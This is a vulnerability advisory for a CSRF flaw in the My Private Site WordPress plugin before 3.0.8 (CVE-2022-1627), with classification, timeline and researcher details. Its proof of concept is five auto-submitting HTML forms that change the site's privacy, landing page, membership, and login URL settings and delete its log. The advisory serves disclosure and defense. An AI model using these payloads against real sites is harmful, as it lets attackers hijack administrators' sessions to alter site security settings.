WordPress Plugin Vulnerabilities

My Private Site < 3.0.8 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_site_privacy">
    <input type="text" name="jr_ps_admin_advanced_compatibility_mode" value="STANDARD">
    <input type="text" name="jr_ps_button_site_privacy_save" value="Save Privacy Status">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_landing_page">
    <input type="text" name="jr_ps_admin_landing_page_option" value="url">
    <input type="text" name="jr_ps_admin_landing_page_url" value="https://example.com/whatever">
    <input type="text" name="jr_ps_button_landing_page_save" value="Save Landing Page">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_membership">
    <input type="text" name="jr_ps_admin_membership_register" value="on">
    <input type="text" name="jr_ps_admin_membership_reveal" value="on">
    <input type="text" name="jr_ps_button_membership_save" value="Update Options">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_advanced">
    <input type="text" name="jr_ps_admin_advanced_enable_custom_login" value="on">
    <input type="text" name="jr_ps_admin_advanced_url" value="https://example.com.google.com">
    <input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
    <input type="text" name="jr_ps_button_advanced_save" value="Save Advanced Options">
    <input type="text" name="my_private_site_system_information" value="The log is empty.">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_advanced">
    <input type="text" name="jr_ps_admin_advanced_url" value="">
    <input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
    <input type="text" name="my_private_site_system_information" value="The log is empty.">
    <input type="text" name="jr_ps_button_settings_logs_delete" value="Delete Log">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
jonradio-private-site
Fixed in 3.0.8

References

CVE
CVE-2022-1627

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
70ce3654-8fd9-4c33-b594-fac13ec26137

Timeline

Publicly Published
2022-06-01 (about 1 years ago)
Added
2022-06-01 (about 1 years ago)
Last Updated
2023-03-01 (about 1 years ago)

Other

Published
Title
Published
2024-04-10
Title
e2pdf < 1.23.00 - Cross-Site Request Forgery
Published
2024-03-19
Title
Contests by Rewards Fuel < 2.0.63 - Cross-Site Request Forgery to Stored Cross-Site Scripting
Published
2022-11-09
Title
REST API Authentication < 2.4.1 - Settings Update via CSRF
Published
2021-07-06
Title
WP HTML Mail < 3.0.8 - CSRF to XSS
Published
2020-09-16
Title
Dokan < 3.0.9 - Cross-Site Request Forgery